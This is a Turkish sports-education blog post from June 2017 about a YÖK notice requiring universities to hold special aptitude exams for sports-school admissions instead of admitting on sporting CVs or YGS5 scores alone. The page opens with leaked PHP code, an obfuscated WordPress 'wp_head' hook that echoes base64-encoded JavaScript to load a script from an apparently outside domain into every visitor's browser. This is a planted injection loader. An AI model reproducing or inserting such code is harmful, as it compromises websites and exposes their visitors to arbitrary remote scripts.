function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); YÖK'ten Flaş Özgeçmiş ve YGS5 Açıklaması – Besyo Hakkında Güncel Bilgiler

YÖK’ten Flaş Özgeçmiş ve YGS5 Açıklaması

13 Haziran 2017
Genel
7 4

YÖK’ün 9 haziran 2017 itibariyle tüm okullara gönderdiği yazıda belirtildiği gibi;
Özel yetenek sınavıyla öğrenci alan üniversitelerin bir kısmı sadece sportif özgeçmişle öğrenci almakta, bir kısmı ise YGS5 puanına göre sıralayıp değerlendirmeye almaktadır. YÖK’ün yaptığı bu açıklamada özel yetenek sınavı yapacak üniversitelerin bu şekilde öğrenci alamayacağını belirtilmektedir.
Buna göre bu yıl Hacettepe Üniversitesi, Sakarya Üniversitesi, Eskişehir Üniversitesi gibi sadece özgeçmişle alacak üniversitelerin sınavları iptal olabilir. Bununla ilgili en yakın süreçte sizlere bilgi vereceğiz. Ancak, sadece sportif özgeçmişle öğrenci alması beklenen Düzce Üniversitesi, Yozgat Bozok Üniversitesi, Muğla Üniversitesi gibi üniversitelerin Özel yetenek sınavı yapması gerektiği YÖK yazısıyla resmileşti.


Konuyla ilgili Boğaziçi öğretim görevlisi sayın Dr Mustafa Erol; Bir çok üniversiteye yazı göndermiş ve geri dönüş almıştı. YÖK nezdinde yapılan bu açıklamada büyük bir payı vardır.
İşte aynı zamanda İstanbul Sprint Spor Akademisi Başantrenörü olan Mustafa hocamızın gönderdiği yazı ve aldığı dönüt;

0

Bir Cevap Yazın

Menü